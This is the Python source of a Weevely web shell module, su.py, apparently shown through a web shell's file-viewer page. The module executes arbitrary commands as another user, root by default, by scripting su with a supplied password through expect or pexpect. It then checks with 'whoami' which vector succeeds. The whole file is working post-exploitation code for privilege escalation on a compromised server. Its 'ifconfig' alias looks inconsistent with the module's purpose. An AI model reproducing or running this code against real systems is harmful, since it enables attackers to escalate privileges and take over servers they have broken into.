Viewing file:  su.py (4.12 KB) -rw-r--r--
Select action/file-type:
 (+) |  (+) |  (+) | Code (+) | Session (+) |  (+) | SDB (+) |  (+) |  (+) |  (+) |  (+) |  (+) |
import re
from weevely.core import messages
from weevely.core.loggers import log
from weevely.core.module import Module
from weevely.core.module import Status
from weevely.core.vectors import PythonCode
from weevely.core.vectors import ShellCmd
class Su(Module):
"""Execute commands with su."""
aliases = ["ifconfig"]
def init(self):
self.register_info({"author": ["Emilio Pinna"], "license": "GPLv3"})
self.register_vectors(
[
ShellCmd(
"""expect -c 'spawn su -c "${command}" "${user}"; expect -re "assword"; send "${ passwd }\r\n"; expect eof;'""",
name="sh_expect",
postprocess=lambda x: re.findall("Password: (?:\r\n)?([\\s\\S]+)", x)[0]
if "Password: " in x
else "",
),
PythonCode(
"""
import pexpect as p,sys
c = p.spawn("su ${user} -c ${command}")
c.expect(".*assword:");c.sendline("${ passwd }")
i = c.expect([p.EOF,p.TIMEOUT])
if i!=p.TIMEOUT:
sys.stdout.write(c.before[3:].decode("utf-8","replace"))
""",
name="pyexpect",
),
]
)
self.register_arguments(
[
{"name": "passwd", "help": "User's password"},
{"name": "command", "help": "Shell command", "nargs": "+"},
{"name": "-user", "help": "User to run the command with", "default": "root"},
{"name": "-stderr_redirection", "default": " 2>&1"},
{
"name": "-vector-sh",
"choices": (
"system",
"passthru",
"shell_exec",
"exec",
"popen",
"proc_open",
"perl_system",
"pcntl",
),
},
{"name": "-vector", "choices": self.vectors.get_names()},
]
)
def setup(self):
"""Probe all vectors to find a working su command.
The method run_until is not used due to the check of shell_sh
enabling for every tested vector.
Args:
self.args: The dictionary of arguments
Returns:
Status value, must be Status.RUN, Status.FAIL, or Status.IDLE.
"""
args_check = {"user": self.args["user"], "passwd": self.args["passwd"], "command": "whoami"}
(vector_name, result) = self.vectors.find_first_result(
names=[self.args.get("vector", "")],
format_args=args_check,
condition=lambda result: (
# Stop if shell_sh is in FAIL state
self.session["shell_sh"]["status"] == Status.FAIL
or
# Or if the result is correct
(self.session["shell_sh"]["status"] == Status.RUN and result and result.rstrip() == self.args["user"])
),
)
if self.session["shell_sh"]["status"] == Status.RUN and result and result.rstrip() == self.args["user"]:
self.session["shell_su"]["stored_args"]["vector"] = vector_name
return Status.RUN
log.warn(messages.module_shell_su.error_su_executing)
return Status.IDLE
def run(self, **kwargs):
# Join the command list and
# Escape the single quotes. This does not protect from \' but
# avoid to break the query for an unscaped quote.
self.args["command"] = " ".join(self.args["command"]).replace("'", "\\'")
format_args = {"user": self.args["user"], "passwd": self.args["passwd"], "command": self.args["command"]}
if self.args.get("vector_sh"):
format_args["vector"] = self.args["vector_sh"]
if self.args.get("stderr_redirection"):
format_args["stderr_redirection"] = self.args["stderr_redirection"]
return self.vectors.get_result(name=self.args["vector"], format_args=format_args)
|